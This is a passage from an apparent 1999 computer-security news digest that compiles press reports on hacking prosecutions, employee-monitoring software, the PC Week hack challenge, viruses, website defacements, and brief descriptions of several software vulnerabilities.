lack of privacy? First, stop giving it away, stop filling out questionaires or applying for things you don't need. Second, follow some of these links and learn some more. General Privacy on the Net Rant - Stolen from Freedom Networks with Permission. A must read for the uninitiated. http://www.hackernews.com/misc/private.html NewOrder Box - Lots of Privacy and Anonymity Links http://neworder.box.sk/box.php3?gfx=neworder&prj=neworder&key=anonym&txt=Anonymity The Electronic Frontier Foundation - Fighters for Online Privacy http://www.eff.org/ @HWA 11.0 Grade Changers Sentenced ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by riot Two students of Evergreen High School who broke into the school computer systems and changed grades for 31 fellow students have plead guilty. The perpetrator was charged with computer trespass and received a 30 day sentence with one year of probation. The students who paid to have their grades changed have not been charged but where suspended from school for 10 days. The Columbian http://www.columbian.com/09181999/front_pa/80694.html SCHOOL COMPUTER HACKER PLEADS GUILTY Saturday, September 18, 1999 By STEPHANIE THOMSON, Columbian staff writer Adam Jerome, the hacker who boosted grades for fellow students at Evergreen High School, pleaded guilty Friday to one count of felony computer trespass. He is to be sentenced Oct. 7 by Superior Court Judge Barbara Johnson. Jerome's money man in the scheme, Phillip Latimer, pleaded guilty Friday to misdemeanor computer trespass and was handed a 30-day sentence. Latimer, 18, will spend two days in Clark County Jail. The other 28 days will be served on work crew, and he will be on probation for one year. "Mr. Latimer was essentially the marketing person for Mr. Jerome's services," said deputy prosecutor Beau Harlan, in explaining to Judge Johnson why Latimer was allowed to plead to the lesser charge. Latimer collected about $170 from students who wanted their transcripts altered. Jerome, 18, likely will face a stiffer punishment. Harlan said he will recommend a 90-day sentence for Jerome, who was on juvenile probation for burglary when he hacked into the school district's computer system. "I'm not saying it's the crime of the century, but it's serious," Harlan said Thursday. "It has cost the school district a lot of money and caused a lot of concern." Harlan said Jerome altered 31 transcripts by boosting grades, adding credits for courses not taken or modifying schedules. Of those 31 transcripts, 22 belonged to students who paid between $2 and $80 for the services. Some students had as many as 15 or 16 grades changed, including one for a course called "You and the Law." Harlan told Judge Johnson that school officials estimate it will cost more than $15,000 to upgrade the security on the computer system. Latimer and Jerome will be ordered to pay restitution, as yet undetermined. Jerome leaves next week for his freshman year at Seattle University. "The goal, obviously, is to have the sentence work out with his school schedule," said his attorney, Jon McMullen. He said his client had no idea hacking into the school's computer system was a felony. "He knew what he was doing was wrong, but it's a question of how wrong," McMullen said after the court hearing. "The concept was that it was a school thing, like erasing grades in a grade book. He thought he might be expelled, but not labeled a felon for the rest of his life." Latimer's court-appointed attorney, Mary Arden, said Latimer attends Summit View High School in Battle Ground and needs 21/2 credits to graduate. Latimer plans to attend Clark College in January with the goal of transferring to four-year college, Arden said, and works for his brother's construction company. He also volunteers for Habitat for Humanity, and Arden asked that he be sentenced to perform community service. But Johnson opted for jail and work crew. "I think you should have some idea what that experience is like," Johnson told Latimer, who has no prior criminal record. She asked why he participated in the scheme. Latimer apologized and said the hacking started as a prank. "To this day I can't really say why I did it," Latimer said. "I just honestly know it was a mistake." As for the students who paid to have their grades changed, Prosecutor Art Curtis said Friday morning his office decided not to charge them with any crimes. "The only two individuals referred to prosecutors by the Evergreen School District were Mr. Jerome and Mr. Latimer," Curtis said. "The district believes that all of the other students involved in this situation were punished appropriately by the school." The students most of them seniors were suspended for 10 days. Jerome was expelled and not allowed to attend the graduation ceremony. "We believe prosecution of the two most culpable individuals serves justice in this case," Curtis said. "And we hope the students who are not going to be prosecuted appreciate the break they are getting." Jerome's name surfaced in late April, when a student told a teacher of a grade-changing scheme. Jerome cooperated with school district officials and police investigators, identifying the students with altered records and showing administrators in the district's computer office how he found lapses in the system. @HWA 12.0 Similar B02K Product Goes Commercial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond So Cult of the Dead Cow gets raked over the coals for releasing B02K. Now this company is getting thousands of dollars from high-profile corporations and government agencies for essentially the same thing. This new remote admin tool/trojan is called Investigator 2.0 from WinWhatWhere. Will the Anti Virus vendors add this software to their list of checked for items? Is the difference between a malicious trojan and a helpful program just the price tag? TechWeb http://www.techweb.com/wire/story/TWB19990917S0014 Wired http://www.wired.com/news/news/politics/story/21847.html TechWeb; TechWeb; Stealth Software Rankles Privacy Advocates (09/17/99, 5:19 p.m. ET) By Stuart Glascock, TechWeb A super stealthy software covertly monitors all keyboard and application activity, then invisibly e-mails a detailed report to the employees' boss. While it bolsters IT's ability to monitor workplace computer usage, it troubles privacy advocates. The newly upgraded software, Investigator 2.0 from WinWhatWhere, runs silently, unseen by the end-user as it gathers exacting details on every keystroke touched, every menu item clicked, all the entries into a chat room, every instant message sent and all e-commerce transactions. "You get shocking detail," said Richard Eaton, president of WinWhatWhere, in Kennewick, Wash. In one client case, a large grocery store chain suspected an employee was wrongfully taking information. Management installed the software and discovered the suspect employee was saving accounting information onto a diskette. In other cases, employees have been busted for taking client lists and sales leads. WinWhatWhere Customers have included sensitive government agencies, private investigators, a trucking company, a tool and die company, a penitentiary, a dentist, and several libraries. Specific customers have included the U.S. State Department, the U.S. Mint in Denver, Exxon, Delta Airlines, Ernst & Young, the U.S. Department of Veteran Affairs, and Lockheed Martin. "People buying it the most are people in corporations who need it because they suspect something is going on in a department, so they put on a computer for a small amount of time," Eaton said. While it may sound Orwellian, electronic monitoring can serve a purpose, said Jan Kallberg, chief operating officer of CyberDefense, a New York company specializing in protecting corporate digital assets. "It can be a good thing if the rules are set and everybody knows the policies, then it eliminates the risk that someone gets blamed who is without any guilt," he said. It is not surprising that major employers are concerned about employee computer use, but monitoring all their keystrokes is frightening, said Lou Maltby, ACLU director of employment rights. "Employers who practice this kind of monitoring don't have a clue as to what they are getting into," Maltby said. "People now turn to the Web for all kinds of information, including information about the most sensitive personal issues imaginable. If you are a member of [Alcoholics Anonymous], 20 years ago, you went to a meeting. Today, you are just as likely to talk to your support group over the Web. The same is true for incest survivors and people who are HIV positive. If you want to pry into your employees' deepest, darkest secrets, there couldn't be a better way." Workplace electronic monitoring calls out for new privacy legislation, Maltby said, adding it is illegal for employers to listen in on an employee's telephone call to a spouse. But the same conversation over e-mail could be read and posted on a bulletin board. No legislation to address the issue is currently pending. Privacy concerns aside, most corporations need protection, and not just from people who are hacking into their network, but from people working inside the firewall, Eaton said. "If it is used incorrectly it is horrible," Eaton said." If you put it on with no suspicion or reason, that's wrong. But if you suspect something is going on your equipment, you have every right to do this." Pricing runs from $99 for a single user to $5,500 for site licensing. @HWA 13.0 Mitnick, Encryption and the Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Adam A lot of people think the Mitnick case is done and over but in legal circles the wrangling is just beginning. With the wacky and unprecedented rulings made by Judge Pfaelzer regarding encrypted evidence legal experts may be studying this case for a while. Forbes http://www.forbes.com/penenberg (Url provides a 404 error, tried appending .htm, .html and .asp etc -Ed) 14.0 Another 'hacker' challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~ In all fairness to PCWEEK they did ask how YOU would go about testing new security software... - Ed Another 'Hacker' Challenge From HNN http://www.hackernews.com contributed by David PC Week has taken a novel step and decided to actually test the security of certain internet products. This attempt should commended. Unfortunately the method they chose isn't very scientific and is designed more for publicity than anything else. With two servers, one NT with IIS and one RedHat with Apache, the editors of PC Week have invited the public to attempt to break in and have offered a measly $1,000 gift certificate to anyone who is successful. Any conclusions PC Week makes from this experiment will not be very indicative of the real world and will give consumers inaccurate information. Hack PC Week http://www.hackpcweek.com APB Online http://www.apbnews.com/newscenter/internetcrime/1999/09/20/hack0920_01.html News Alert http://www.newsalert.com/bin/story?StoryId=Cn:wXqbWbtLLnmda5&FQ=Linux&SymHdl=1&Nav=na-search-&StoryTitle=Linux Hack PC Week; Hack Our Servers and Win a $1000 Gift Certificate How do you test security? Install similar applications on two operating systems and invite the world to come in. Departing from static testing these server are running a real world application, based on a classified ad system for a newspaper. This will test not only the operating system but the entire implementation. For NT this includes ASP, IIS and MTS, and SQLServer 7, while Linux will use Apache and mod_perl. A sample logfile of activity (200k over 30minutes) during 'peak' attack times is available for perusal here: http://www.hackpcweek.com/axentlogsm.html APB Online; Magazine to Hackers: We Dare You Issues $1,000 Challenge to Break Into a New Web Site Sept. 20, 1999 By David Noack NEW YORK (APBnews.com) -- Most Web sites -- like The Drudge Report, the American Stock Exchange, NASDAQ, ABC and the NAACP, all victims in a recent rash of hacking attacks -- would prefer that hackers never took an interest. But one computer magazine's testing lab is actually enticing hackers to take a shot. PC Week Labs has created a Web site for the specific purpose of challenging hackers, and is offering a $1,000 gift certificate to the computer cracker who breaks into the site. The site is already operating and will remain online for one month -- assuming it doesn't get knocked out sooner. Trying to mirror targeted sites PC Week magazine is part of the Ziff-Davis family of computer magazines, which range from Computer Shopper to PC Computing. The company also operates several computer and high-tech Web sites and a computer news cable television channel. The challenge comes after a group calling itself the ULG, for United Loan Gunman, claimed responsibility for the latest string of attacks. Computer security experts are trying to determine if they are the same group as HFG, or Hacking for Girlies, which crippled The New York Times on the Web last September. In an effort to make the testing as accurate as possible, PC Week Labs is using "near-identical" systems and server software as the Web sites that were hacked, which is a combination of Microsoft's Windows NT 4.0, which is running Internet Information Server (IIS), and Red Hat Linux 6.0, which is using the Apache server. Aim is to help public The intended hack is a classified ad engine application running on each of the two operating systems, and hackers are suppose to break into the site, mark up the home page and steal user information. "Security is extremely important in the Internet environment, and both Microsoft and the Linux community, via Red Hat, boast that their operating systems are secure," said John Taschek, director of PC Week Labs. He said plans for the hacking challenge were in place months before the high-profile hacking attacks. "Our main goal is not to show which OS is most vulnerable," said Taschek. "We anticipated there would be many times more attempts to break into the NT site than the Linux site, simply because more people are familiar with it, and more people have an agenda against Microsoft. Our goal is to document how the hackers and crackers broke in and then to release to the public, in the form of a story, how companies can boost up their defenses against such attacks." A challenging trend The entire challenge will be tracked with the number of each hacking attempt for the different operating systems and reported in an upcoming issue of PC Week magazine. The Web site is being hosted by AboveNet, a San Jose, Calif.-based Internet service provider, and is using two-way servers from Compaq and Dell. The hacking challenge is part of a growing trend by companies and computer security concerns to engage in so-called ethical hacking, where hacking attempts are made to discover server vulnerabilities. Companies are either hiring or contracting with hackers or security firms to perform the service. Critics call it 'publicity stunt' Critics say hacker challenges are nothing more than public relations efforts that prove little. "Hacker challenges and the like are nothing more than publicity stunts. Unfortunately they are becoming more and more popular with vendors these days," said Space Rogue, editor in chief of the Hacker News Network. "It gives them a very strong marketing angle: 'Our product withstood umpteen-million hack attempts during our latest challenge.' This just paints an inaccurate picture to the consumer. The consumer thinks that oh, wow, it must be secure." He said that companies involved in Internet security typically don't conduct hacker challenges. "The most knowledgeable people in the security business are busy making a living fulfilling paid contracts from vendors who want a real security analysis. They/we don't have time to feed someone else's marketing machine," said Rogue. Checking security components Taschek said that any time a company conducts a hacker challenge it's deemed a publicity stunt but insisted this one was different. "We feel we're actually doing companies a favor by releasing details of how hackers were successful and what worked well in our defense. I can assure you that we're not just doing this for publicity," said Taschek, who added that the magazine was not approached by any company to conduct the test. Rogue did say he's glad to see that the challenge is testing different security components. "About the only interesting thing I can see on this whole setup is that they are 'testing' more than one thing. They have a complete e-commerce setup, which is good because sometimes vulnerabilities in a product only appear when used with other products," said Rogue. Computer attacks on the rise In the 1999 Computer Crime and Security Survey by the Computer Security Institute and San Francisco office of the FBI, it found that hacking by outsiders increased for the third year in a row, with 30 percent of respondents reporting intrusions. The survey was released in March. The survey is gleaned from responses from 521 security practitioners in U.S. corporations, government agencies, financial institutions and universities. Those reporting their Internet connection as a frequent point of attack rose for the third straight year, from 37 percent of respondents in 1996 to 57 percent in 1999. Unauthorized access by insiders also rose for the third straight year, with 55 percent of respondents reporting incidents and 26 percent reporting theft of proprietary information. More attacks get reported The survey also discovered a dramatic increase in the number of respondents reporting serious incidents to law enforcement: 32 percent of respondents did so, a significant increase over the three prior years in which only 17 percent reported such events. For the third consecutive year, financial losses due to computer security breaches amounted to more than $100 million. Fifty-one percent of respondents acknowledged suffering financial losses from such security breaches, but only 31 percent were able to quantify their losses. The most serious losses occurred through theft of proprietary information (23 respondents reported a total of $42.5 million) and financial fraud (27 respondents reported a total of $39.7 million). Outside threat rises Although the results indicate a wide range of computer security breaches, a growing trend is the continued increase in attacks from outside the organization. The trend was reinforced by other survey results. For instance, of those who acknowledged unauthorized use, 43 percent reported from one to five incidents originating outside the organization, and 37 percent reported from one to five incidents originating inside the organization. David Noack is an APBnews.com staff writer (david.noack@apbnews.com). News Alert; September 20, 1999 08:18 PC Week Labs Challenges Hackers To Crack Web Site; Establishes hackpcweek.com To Assess Security of Windows NT and Red Hat Linux Systems FOSTER CITY, Calif., Sept. 20 /PRNewswire/ -- In a major test of the security of Linux and Windows NT, PC Week Labs today threw down the gauntlet to Internet hackers, challenging them to break into a Web site, http://www.hackpcweek.com, to try to crack each or both of the operating systems. The site goes live today for a one-month trial. The site contains near-identical systems, one running Windows NT with Internet Information Server (IIS) and the other running Red Hat Linux 6.0 with Apache as its web server. PC Week Labs created similar classified-ads engine applications running on each system. The challenge is to break into the site, mark up the home page and steal user information from the classified-ads engine. "Security is extremely important in the Internet environment and both Microsoft and the Linux community, via Red Hat, boast that their operating systems are secure," noted PC Week Labs Director John Taschek. PC Week Labs will track the number of attempts for each operating system and report the results in an upcoming issue of PC Week. Additionally, PC Week will issue a prize to whomever hacks into the site first. The challenge terminates when the first hacker accomplishes any of the test challenges. Winners will receive computer-equipment gift certificates of up to $1,000. "Corporations, financial institutions and government agencies are susceptible from attack via the Internet," Taschek said. He cited figures from a 1999 survey conducted by the Computer Security Institute and the FBI indicating that organizations reporting their Internet connection as a frequent point of attack rose for the third consecutive year to 57 percent in 1999 from 37 percent in 1996. Financial losses due to computer security breaches were reported as exceeding $100 million this year. Taschek also noted that, in recent weeks, the Nasdaq/Amex, the Drudge Report and ABC sites were all hacked in someway. Each of these three web sites runs either Windows NT with IIS or Linux as their front-line web servers. The hackpcweek.com site, being hosted by AboveNet, a San Jose, Calif.-based Internet service provider, is using Compaq and Dell two-way servers. PC Week Labs created similar applications running on each system. For Windows NT, PC Week developed a classified ads engine based on a Microsoft guest book application; for Linux, the Labs chose Smart Photo Ads, a popular classified-ads engine for the platform. In addition, the competition is "open" to the general public via the Internet so that people can view how hacks are being made. Visitor interaction is encouraged and an online discussion database will track users feelings about whether Windows or Linux has more open standards. About PC Week PC Week reaches 400,000 core e-business IT buyers at 217,000 Internet-connected sites. These buyers purchase Internet and intranet products and services, networking and systems products for their organizations. They have an average budget authority of $11.9 million. PC Week delivers essential investigative news, solutions evaluation, and business strategy for those charged with building .com enterprises. (Source: BPA) About Ziff-Davis Ziff-Davis Inc. is a leading media and marketing company focused on computing and Internet-related technologies, with principal platforms in print publishing, trade shows and conferences, online content, television and education. Ziff-Davis provides global technology companies with marketing strategies for reaching key decision-makers. Ziff-Davis has two series of common stock: one which is intended to track the performance of its Internet business ZDNet, and one which is intended to track the performance of the ZD Group, which includes print publishing, trade shows and conferences, education, market research and television businesses and an 83 percent retained interest in ZDNet. SOURCE Ziff-Davis Inc. /CONTACT: Barry Zusman of Plesser Associates, 212-319-8383, bzusman@plesser.com, for PC Week/ /Company News On-Call: http://www.prnewswire.com/comp/987950.html or fax, 800-758-5804, ext. 987950/ /Web site: http://www.hackpcweek.com/ @HWA 15.0 9999 Caused at Least One Problem ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Code Kid A pharmaceutical factory on the southern island of Hainan in China crashed on September 9, 1999. The crash effected 11 systems and 20 platforms. This is the only reported crash that we know of due to this bug. Inside China Today http://www.insidechina.com/news.php3?id=93699 China Reports First Crash From '9999' Bug BEIJING, Sep 21, 1999 -- (Reuters) A pharmaceutical factory in China suffered a computer crash on September 9, 1999, when the system read the date as a command to stop, the China Youth Daily reported on Tuesday. A system at the factory on the southern island of Hainan read the date as an old programming cut-off code in which four nines were used to tell computers to stop processing data, it said. China, believed to be one of the less well-prepared countries for the Y2K computer bug that some feared the four nines code would foreshadow, had reported no problems on September 9. The newspaper said the Hainan factory suffered a crash of 11 systems and 20 platforms, but production was not affected. The factory director was warned the systems were not millennium-compliant, but ignored requests for new computer equipment and service systems, the newspaper said. The Y2K, or millennium, bug could cause chaos in old computers programmed to recognise years by the last two digits and could confuse 1900 with 2000 and crash. A U.S. State Department report published earlier this month said inland Chinese cities faced potential Y2K computer problems affecting banking, communications, medical services and power. However, China reported on Monday that a third and final Y2K test of its financial system over the weekend was a success. (C)1999 Copyright Reuters Limited. All rights reserved. Republication or redissemination of the contents of this screen are expressly prohibited without the prior written consent of Reuters Limited. @HWA 16.0 Japans Virus Infestations at Record Pace ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Code Kid The Information Technology Promotion Agency has reported 2,451 virus infestations so far this year. This has already exceeded the entire number of cases from all of 1997 which totaled 2,391, the most ever recorded. The most prolific viruses reported where Happy99, Melissa and ExploreZip with the highest infection method coming through email. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/82335 Virus Infections in Jan.-Aug. Surpass Yearly Record of 1997 September 20, 1999 (TOKYO) -- The number of computer virus infections in Japan in August reached 216 cases, and in the January-August period it registered 2,451, according to a report released by the Information Technology Promotion Agency (IPA). The number of cases reported in recent months has trended downward. However, the January-August damage cases exceeded the 1997 number of 2,391, the largest annual total. It is now certain that 1999 will have the biggest number of damage cases reported in a single year. There were 25 types of virus incidents reported in August. Of those, Ska (nicknamed Happy99) was reported most frequently, or 66 times. E-mail infections accounted for 76 percent of all infections. According to the IPA, the trend in virus reports submitted in August was similar to that of the previous month. The types of virus cases spread through e-mail increased, including Happy99, Melissa and ExploreZip. New types appeared one after another, including W97M/Opey, which was reported in August. The IPA is warning users to take thorough prevention measures such as (1) to open files attached to e-mail only after having them inspected by anti-virus software, and (2) to constantly update virus-defining information through anti-virus software. Related story: Computer Viruses in Japan on Steep Rise in Jan.-June '99; Close to '98 Total (BizTech News Dept.) 17.0 Another Word Macro Virus Found ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Michelle After scouring the the alt.sex hierarchy of Usenet the researchers at Network Associates have found and identified yet another Word Macro Virus. The Suppl Word macro virus, which was found in over 25 alt.sex newsgroups, has been given a medium risk rating. Computer World http://www.computerworld.com/home/news.nsf/all/9909201virus (Online News, 09/20/99 12:06 PM) New Word virus hits Net By Douglas F. Gray LONDON -- Network Associates Inc. today announced it has given a medium risk rating to a new virus posted to Usenet newsgroups over the weekend. The Suppl Word macro virus, which was posted to over 25 alt.sex newsgroups was discovered by Network Associates' 24-hour Anti-Virus Emergency Response Team on Friday, the antivirus software vendor said in a statement issued today. The recent Melissa virus was also discovered in the alt.sex newsgroups, the statement added. The Suppl virus has destructive power similar to ExploreZip.Worm, which infected machines running Microsoft Corp. programs in June, according to Network Associates. Users infected with Suppl will spread the virus, as well as suffer data loss, Network Associates said. After the user is infected, the virus automatically attaches a document called "SUPPL.DOC" to all outgoing mail. Approximately 163 hours after infection, the virus then renders files with certain suffixes, such as .doc, inaccessible. @HWA 18.0 News from Sla5h our new Croatian correspondant ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h can be reached here: smuddo@yahoo.com 18.1 Lawyer: Hackers Have Rights, Too ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com Hackers, virus spreaders, and other computer criminals are hard to catch but easy to convict -- mainly because they almost always confess. So says Jennifer Stisa Granick, a San Francisco-based criminal defense lawyer who specializes in cybercrimes. Her clients include arch-hacker Kevin Poulsen, who in the early 1990s ran riot through Pacific Bell's computer system, electronically swiped a Porsche from a radio station, and evaded pursuing Feds for 17 months before winding up behind bars on a four-year sentence. Once they are caught, hackers like Poulsen generally confess, in part because of the unformed state of cyberlaw, Granick said Thursday at Black Hat Briefings, an annual cybersecurity conference in Las Vegas. There are no clear rules on how to measure damage done by a hacker, Granick explained to a roomful of security professionals gathered at the Venetian casino-hotel. For instance, prosecutors can claim that a hacker who gained access to a list of thousands of credit cards had the potential to steal millions of dollars worth of credit, and so should be charged as if he had executed the theft. The affected company can then add on the cost of restoring its breached system's security. "Companies come in with these hugely inflated estimates of damages that are like a sword hanging over your head," said Granick. "That scares defendants and attorneys into cutting a deal." The ephemeral nature of the forensic evidence computer criminals leave behind makes catching them uniquely difficult. Burglars often leave fingerprints, are seen by eyewitnesses, or trip up and reveal their connection to stolen items. Electronic criminals, however, can mask their identity by forwarding email through anonymous re-mailing servers or through encryption, and what they steal, damage, or just view without authorization can go long unnoticed. Trusting the digital evidence that exists is tricky, too, since electronic information can so easily be erased or altered. Still, prosecutions of computer crimes are rising, said Granick. Law enforcement agencies -- particularly the Department of Justice, which goes after most cyber-scofflaws -- are boosting funding for and training on cybercrimes, she said. "When you've got more money and better training, you start finding more criminals." Unlawful possession of credit card information, unauthorized intrusions into Web pages, and sending out viruses are among the most commonly prosecuted transgressions. @HWA 18.2 Cracking for the Man ~~~~~~~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com Nearly two years ago, when Jeff Moss took a job as director of security assessment for Secure Computing, the idea of hacker types joining the computer security work force seemedfar-fetched. Not any more. Applications from even the big-name companies were notoriously full of holes, after all, and there weren't many people who knew how to find them. "Companies hired people from the underground because there were no other people available," said Moss, who is also known in tech circles as the organizer of DefCon, the annual Las Vegas gathering of hackers and computer security types. Although corporations shied away from hiring anyone with an actual criminal record, they weren't picky about how somebody acquired their skills. So a mini-industry emerged around the idea of "ethical hacking." The phrase inspires images of black-clad code pushers trading in underground connections for a corporate job, but the reality is more mundane. "There are a lot of people from the hacking scene who are in corporate America, working away," Moss said. "There's no incentive for them to draw attention to their past." These days, Moss is doing what he can to establish closer ties between the security side and the hacker underground. In July, he organized the third session of Black Hat briefings, a computer security conference bringing together corporate types, freelance hackers, and government officials to hash out hot topics affecting the industry. The last session, held in Las Vegas, touched on everything from the psychological profiling of virus writers to the military strategy for defeating cyber-terrorists. This fall, Moss is ranging far afield, launching Black Hat seminars in Amsterdam and Singapore, with a similar mix of officials and geeks. "It has that sort of mystique in the sense of the people who are speaking," Moss said. "One might be in a business suit, and then you'll have a guy from Canada with blue hair talking about ways to subvert dynamic routing protocols." Edginess aside, Moss said he hopes to keep the focus pretty technical. The hot topic will be computer forensics: the collection and analyzing of information after a break-in occurs to evaluate damage and track down perpetrators. @HWA 18.3 Moscow Mayor's Site Hackski'd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com Moscow Mayor Yuri Luzhkov, fresh from winning an important legal victory for his parliamentary election bloc, faced a surprise attack from cyberspace Thursday. Luzhkov's Fatherland party election campaign headquarters said opponents had opened a bogus page on the Internet which copied his official site but had data "blatantly distorting Luzhkov's position and the facts of his private life." "It is an unworthy move from the moral and ethical point of view," a spokesman for Luzhkov's campaign headquarters said. "This was created by a competing political organization." Luzhkov is becoming one of Russia's most influential politicians: As well standing for re-election as mayor on 19 December, his party is also expected to do well in national parliamentary elections. He is also tipped as a possible candidate in presidential elections next year. But some critics have zeroed in on his authoritarian style and the bogus Web site capitalizes on this point. Located at www.lujkov.ru, instead of the official www.luzhkov.ru, the page shows him having turned Moscow into his private empire, where his friends and relatives rule the roost. There are also cartoons and photographs ridiculing the mayor. Luzhkov's entry into national politics has been strewn with difficulties. Wednesday he fought and won a battle in the Supreme Court to be allowed to run in the parliamentary vote. A new party of regional governors is also in the making, aiming to undermine the alliance which Luzhkov has built with other regional bosses for the elections. Luzhkov numbers the Kremlin itself as one of his key political opponents. @HWA 18.4 Anti Software Piracy Ads Entice Tattlers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com An advertising campaign against software piracy started in New York in July has yielded dozens of leads from workers willing to tattle on their companies. The Business Software Alliance, a software industry-backed group that combats piracy, spent $250,000 in July to buy billboards in Times Square, ads on the Howard Stern radio show, and posters on subway trains. The ads say "Hey, worker bee, use that stinger for a change, report software piracy." The ads resulted in 60 leads for lawyers to follow up, said Karine Elsen, BSA marketing director in Washington. "It's been a very successful campaign," Elsen said. Software piracy, from people downloading programs off the Internet or copying a program from their work computer and distributing it to friends, cost the $140 billion industry $11 billion in revenue last year, according to BSA. In 1998, U.S. businesses paid $4.5 million in fines and legal fees. The worker bee campaign, now being waged in Chicago, brings in about 150 leads a month from throughout the United States, Elsen said. A good lead gives the group enough information to approach the accused company to do a self-audit. The New York leads have not produced any action on BSA's part so far. "It's too early for us, it takes a while," she said. BSA is an international group with offices in London and Singapore. Elsen said the stinger campaign has not been used in overseas markets. "I don't think those workers would consider themselves worker bees," she said. "We do get good results from New York, maybe because there are more disgruntled people." @HWA 18.5 SERBIA THE FIRST CYBERWAR? ~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com via Help Net Security http://www.net-security.org/ by Thejian, Friday 23rd September 1999 on 0:55 am CET The United States put together its first small group of information warriors, a move that has convinced some Defense experts that the military waged a cyberwar against Serbia this year. According to a high-level draft briefing paper the group of information warriors -- or what the Defense Department refers to as an information operations cell -- was one of the "great successes'' of the 78-day war. According to the draft briefing, information operations (IO) have "an incredible potential" and that "properly executed, IO could have halved the length of the campaign." Federal Computer Week FULL STORY : TAKEN FROM FEDERAL COMPUTER WEEK SEPTEMBER 23, 1999 . . . 17:55 EDT DOD may have waged first cyberwar in Serbia BY BOB BREWIN (antenna@fcw.com) The United States put together its first small group of information warriors, a move that has convinced some Defense experts that the military waged a cyberwar against Serbia this year. According to a high-level draft briefing paper prepared for Adm. James Ellis, the group of information warriors -- or what the Defense Department refers to as an information operations cell -- was one of the "great successes'' of the 78-day war. Ellis is commander of U.S. Naval Forces in Europe and of Joint Task Force Noble Anvil -- the U.S. component of the NATO nations participating in Operation Allied Force. According to the draft briefing, information operations (IO) have "an incredible potential" and that "properly executed, IO could have halved the length of the campaign." A Navy spokesman for Ellis in London declined to say whether the United States engaged in offensive cyberattacks against Serbian computers and command and control systems. Instead, he recited a textbook definition of IO, which included "actions taken to affect adversary information systems'' as well as to defend U.S. systems. Offensive IO actions range from jamming and physical attacks on information systems to computer network attacks. While the spokesman declined to identify which of those actions the United States used against Serbian information systems during Operation Allied Force, retired Maj. Gen. Doyle Larson, chairman of the Air Force Association, said he doubted that the United States set up an IO cell just to manage the bombing of Serbian computer centers or to engage in traditional jamming of Serb radar and radios. Larson, who was the commander of the Air Force Electronic Security Command in the 1980s, said he was convinced that the United States used cyberwar tactics to attack Serb information systems, pointing out that the United States "is attacked all the time by hackers." @HWA 18.6 PCWEEK CHALLENGE SITE HACKED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com by Thejian, Friday 23rd September 1999 on 5:45 pm CET Earlier this week, PC Week Labs "threw down the gaunlet to hackers" with its hack-challenge, it seems that the Secure Linux part of that site now has been defaced. The index shows the messages "Jfs was here" and "details in the file called jfs* in this directory." @HWA 18.7 "Got Root" Got rooted ~~~~~~~~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com 22.09.1999 19:10 Today official website of RootFest was hacked by citadel. On the hacked page citadel is accusing lothos ( organizator of RootFest ). " back back in the old days he went by the name of deadfall. but after he and some friends were busted, he narc'd on them. from then on he was labeled deadnarc. as you can imagine this would be a problem if you were trying to portray the image of a "hacker". so he changed his handle to lothos. ", were the words on defaced page. Links: Attrition mirror http://www.attrition.org/mirror/attrition/1999/09/21/www.rootfest.org/ (The site claimed that lothos was a narq and had this to say on the hacked page: you may think you know this young man, but you do not. his name is mike monson. back back in the old days he went by the name of deadfall. but after he and some friends were busted, he narc'd on them. from then on he was labeled deadnarc. as you can imagine this would be a problem if you were trying to portray the image of a "hacker". so he changed his handle to lothos. then last spring he had conference called "rootfest". above are two photos taken of him at rootfest. wether the allegations are true or not has not been verified, however lothos did speak out in his behalf. we'll publish this if/when I can find a copy of the interview. -Ed ) @HWA 18.8 Hotmail again ~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com 23.09.1999 19:10 Looks like Hotmail 's got problems with security (again). This time problem is with JavaScript (again). Attacker could send a HTML e-mail to victim in HTML there would bec JavaScript that opens same login window as hotmail's. Microsoft admited that this is antoher way to steal password. Links: Cnet http://news.cnet.com/news/0-1005-200-122099.html @HWA 18.9 Misc vulnerabilities and some reading materials ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Sla5h, smuddo@yahoo.com + V U L N E R A B I L I T I E S + ___________________________________________________________________________________________ Microsoft IIS 4.0 Domain Resolution Vulnerability http://securityfocus.net/level2/bottom.html?go=vulnerabilities&id=657 Remote: Yes Local: No Exploit: Yes Published: Thu Sep 23 1999 Updated: Thu Sep 23 1999 IIS 4.0 allows an administrator the option to restrict access by specifying a domain or an IP address If a domain is restricted, but a machine in that domain that cannot be resolved makes an HTTP request, the IIS server will respond as usual. Any subsequent requests will be denied. Restricted hosts with an IP address that can be resolved to a domain name will be denied access from the first request. ___________________________________________________________________________________________ FreeBSD vfs_cache Denial of Service Vulnerability http://securityfocus.net/level2/bottom.html?go=vulnerabilities&id=653 Remote: Yes Local: Yes Exploit: Yes Published: Wed Sep 22 1999 Updated: Wed Sep 22 1999 A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wir... + R E A D I N G + ___________________________________________________________________________________________ Security Problems in the TCP/IP Protocol Suite http://securityfocus.net/level2/bottom.html?go=library&id=1463 by Steven Bellovin Type: paper Year: 1989 Download: PS 